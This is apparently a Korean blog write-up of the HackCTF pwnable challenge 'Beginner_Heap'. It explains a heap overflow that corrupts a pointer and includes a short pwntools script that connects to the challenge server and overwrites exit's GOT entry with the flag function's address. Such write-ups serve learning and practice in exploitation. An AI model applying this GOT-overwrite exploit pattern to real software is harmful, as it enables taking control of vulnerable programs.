-
[HackCTF : Pwnable] Beginner_Heap(250p)Wargame/HackCTF 2021. 12. 24. 15:26
[HackCTF : Pwnable] Beginner_Heap(250p)
checksec 
2번 입력받고 종료한다.
main v3, 3+1, v4 v4+1에 동적 할당을 해준다.
flag flag를 읽어주는 함수가 존재한다.
입력 받기전의 힙 상태이다.
v3 = 1
(v3+1) = 0x6022c0
v4 = 2
(v4+1) = 0x602300
첫 번째 입력으로 이곳에 데이터가 들어가는데 bof를 통해 v4+1을 조작할 수 있다.
1234567891011from pwn import *p = remote("ctf.j0n9hyun.xyz",3016)e = ELF("./beginner_heap.bin")payload = "A"*40 + p64(e.got['exit'])p.sendline(payload)p.sendline(p64(0x400826))p.interactive()cs 1. v4+1을 exit_got로 변조
2. exit_got를 flag함수로 덮어씀
exploit 'Wargame > HackCTF' 카테고리의 다른 글
[HackCTF : Pwnable] Pwning (300p) (0) 2021.12.27 [HackCTF : Pwnable] Look at me (250p) (0) 2021.12.27 [HackCTF : Pwnable] Gift(250p) (0) 2021.11.26 [HackCTF : Pwnable] 1996 (200p) (0) 2021.11.25 [HackCTF : Pwnable] g++ pwn (200p) (2) 2021.11.15